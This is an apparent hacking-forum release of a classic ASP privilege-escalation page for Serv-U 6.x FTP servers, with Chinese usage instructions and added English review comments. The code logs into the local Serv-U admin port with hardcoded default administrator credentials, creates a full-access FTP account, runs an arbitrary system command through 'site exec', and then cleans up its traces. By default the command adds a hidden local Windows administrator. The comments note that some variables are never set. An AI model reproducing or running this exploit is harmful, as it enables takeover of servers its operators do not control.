信息来源:http://www.cnsst.org/
Author:落叶纷飞
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
Author:落叶纷飞
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
<%@ LANGUAGE = VBScript %>
<%
' --------------------------------------------------------------------------
' Serv-U 6.x "local administrator" privilege-escalation page (classic ASP).
'
' Flow, driven by the hidden form field "action":
'   1     open Microsoft.XMLHTTP to 127.0.0.1:<port> (form default 43958) and
'         send, as the request body, a run of FTP-style lines: User/Pass,
'         "SITE MAINTENANCE", -DELETEDOMAIN, -SETDOMAIN (domain "leaves") and
'         -SETUSERSETUP (user "luo", password "ye", home = drive root, access
'         string "RWAMELCDP"), then QUIT. The returned page re-submits itself
'         after 4 s with action=2.
'   2     connect to 127.0.0.1:<ftpport>, log in as luo/ye, send
'         "site exec <cmd>", re-submit with action=3.
'   3     log back into the admin port and send -DELETEDOMAIN to remove the
'         "leaves" domain; display the command that was run.
'   else  abort any XMLHTTP objects parked in Session and render the form.
'
' Presumably the listener on the admin port parses the raw body as FTP
' command lines; that is not verifiable from this listing.
'
' Review notes (grounded in the code below only):
'   * The page has no authentication of its own: u, p, port, c, f and action
'     come straight from Request and are acted on.
'   * user, pass, cmd, port and f are written back into HTML attributes and
'     an inline <script> with no encoding, so the tool itself is open to
'     HTML/script injection via those parameters; the password is echoed in
'     clear text.
'   * `ffport` and `iip` are referenced (ftpport = ffport; -IP=iip) but never
'     assigned from Request anywhere in this listing, and the hidden forms
'     for action 2/3 do not carry them, so both evaluate as Empty here.
'     Whether that is a transcription loss from the original is not
'     determinable from this page.
'   * `timeout=3` is assigned but never read.
'   * Detection artefacts: loopback connections to the admin port, the
'     literal strings "SITE MAINTENANCE", "-SETDOMAIN", "-Domain=leaves|",
'     "-User=luo", "site exec ", and the default payload
'     "net user leaves cnsst /add".
' --------------------------------------------------------------------------
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
' Only guard on input: non-numeric action ends the response. On first load
' action is absent; whether that passes IsNumeric depends on what Request
' returns for a missing key (Empty passes, "" does not) — TODO confirm.
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
' f = drive prefix ("c:") substituted into the -SETUSERSETUP block below.
' Only the first two characters of the supplied value are kept; when empty
' the drive of the Windows folder is used (see Gpath).
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
' NOTE(review): ffport is never assigned in this listing — see header.
ftpport = ffport
' NOTE(review): unused.
timeout=3

' FTP-style command lines sent as the XMLHTTP request body.
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
' NOTE(review): iip is never assigned in this listing — see header.
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
' New account luo/ye with home directory and access entry on the drive root
' ("c:" is replaced by f below); "-Maintenance=System" and "RWAMELCDP" are
' the literal values sent — their meaning is Serv-U's, not shown here.
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
' Replaces every "c:" in the block (HomeDir and Access) with the chosen drive.
newuser=replace(newuser,"c:",f)
select case action
' --- step 1: create domain + user through the admin port -------------------
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
' Third argument True = asynchronous: the script does not wait for a reply.
' The object is parked in Session so the "case else" branch can abort it.
a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session("a")=a
' The HTML below carries u/p/port/c/f forward as hidden fields (unencoded —
' see header) and auto-submits with action=2 after 4000 ms.
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>
<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
' --- step 2: log in as the new user and run the command --------------------
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
' Target is ftpport (Empty in this listing — see header), not the admin port.
b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
' cmd is concatenated verbatim after "site exec ".
b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
set session("b")=b
' Same hidden-field relay as step 1, now auto-submitting with action=3.
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,请等待
,<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
' --- step 3: clean-up — delete the domain created in step 1 ----------------
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
c.send loginuser & loginpass & mt & deldomain & quit
set session("c")=c
' Result page: cmd is echoed unencoded; the button links back to this page
' via GName().
%>
<center>提权完毕,已执行了命令:
<font color=red><%=cmd%></font>


<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
</center>

<%
' --- any other numeric action: abort stale requests, show the form ---------
case else
' Errors are suppressed because the Session entries may not exist yet.
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
' Input form. Defaults: account "LocalAdministrator" / "#l@$ak#.lk;0@P" on
' port 43958, ffport 65500, iip 0.0.0.0, and a command that adds a local
' administrator "leaves". Nothing in this script validates any of them.
%>
<center><form method="post" name="leaves">
<tr align="center" valign="middle">
<td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>
</tr>
<tr align="center" valign="middle">
<td width="200">用户名:</td>
<td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
</tr>
<tr align="center" valign="middle">
<td>口 令:</td>
<td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>
</tr>
<tr align="center" valign="middle">
<td>端 口:</td>
<td><input name="port" type="text" id="port" value="43958"></td>
服务器端口:
<td><input name="ffport" type="text" id="ffport" value="65500"></td>
服务器IP:
<td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>
</tr>
<tr align="center" valign="middle">
<td>系统路径:</td>
<td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
</tr>
<tr align="center" valign="middle">
<td>命 令:</td>
<td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>
</tr>
<tr align="center" valign="middle">
<td colspan="2"><input type="submit" name="Submit" value="提交">
<input type="reset" name="Submit2" value="重置">
<input name="action" type="hidden" id="action" value="1"></td>
</tr>
</form></center>


使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
<% end select
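' Gpath: drive prefix of the Windows folder, lower-cased, as "x:" (e.g. "c:").
'
' Returns: a two-character string "<drive>:". Falls back to "c:" when
' Scripting.FileSystemObject cannot be created, when GetSpecialFolder(0)
' raises, or when the path it returns is shorter than two characters.
' Errors are suppressed with On Error Resume Next and checked via Err after
' each step that can fail.
'
' Fix vs. original: the original stored the FSO in the bare name `f`, which
' (no Option Explicit, and `f` already assigned at script level before the
' call) resolves to the caller's script-level variable, so the helper
' clobbered it and relied on the caller overwriting it right after. Locals
' are now declared, leaving the caller's variables untouched. The original
' also left the return value Empty if GetSpecialFolder failed; that case now
' takes the same "c:" fallback as a creation failure.
function Gpath()
    Dim fso, sysFolder
    on error resume next
    err.clear
    set fso = Server.CreateObject("Scripting.FileSystemObject")
    if err.number > 0 then
        Gpath = "c:"
        exit function
    end if
    ' 0 = WindowsFolder in the FSO SpecialFolder enumeration.
    sysFolder = fso.GetSpecialFolder(0)
    if err.number > 0 or len(sysFolder) < 2 then
        set fso = nothing
        Gpath = "c:"
        exit function
    end if
    set fso = nothing
    Gpath = lcase(left(sysFolder, 2))
end function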
' GName: absolute URL of the currently executing page, assembled from IIS
' server variables. The port is omitted when SERVER_PORT is "80" and written
' as ":<port>" otherwise; SCRIPT_NAME is lower-cased. The scheme is always
' "http://" — HTTPS is not consulted, so on a TLS listener the link is wrong.
'
' NOTE(review): SERVER_NAME can follow the client's Host header on IIS sites
' without a fixed host binding; fine for a self-link, do not reuse this for
' anything security-sensitive without confirming the binding.
Function GName()
    Dim host, page, portPart
    host = request.servervariables("server_name")
    page = lcase(request.servervariables("script_name"))
    If request.servervariables("SERVER_PORT") = "80" Then
        portPart = ""
    Else
        portPart = ":" & request.servervariables("SERVER_PORT")
    End If
    GName = "http://" & host & portPart & page
End Function
%>